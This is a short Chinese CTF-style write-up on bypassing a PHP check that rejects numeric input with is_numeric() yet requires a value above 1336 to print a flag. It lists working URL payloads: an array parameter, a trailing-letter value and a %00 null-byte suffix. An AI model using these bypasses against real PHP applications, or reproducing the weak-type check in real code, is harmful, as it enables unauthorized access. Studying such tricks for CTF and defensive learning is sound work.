弱类型整数大小比较绕过
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
echo $flag;
- is_numeric() 函数用于检测变量是否为数字或数字字符串。
代码分析
解法
由于大多数php函数无法判断数组,故数组绕过。
payload:?password[]=0
很多种方法可以做数组绕过还有%00截断,添加字符绕过
payload:
?password=9999a
?password=9999%00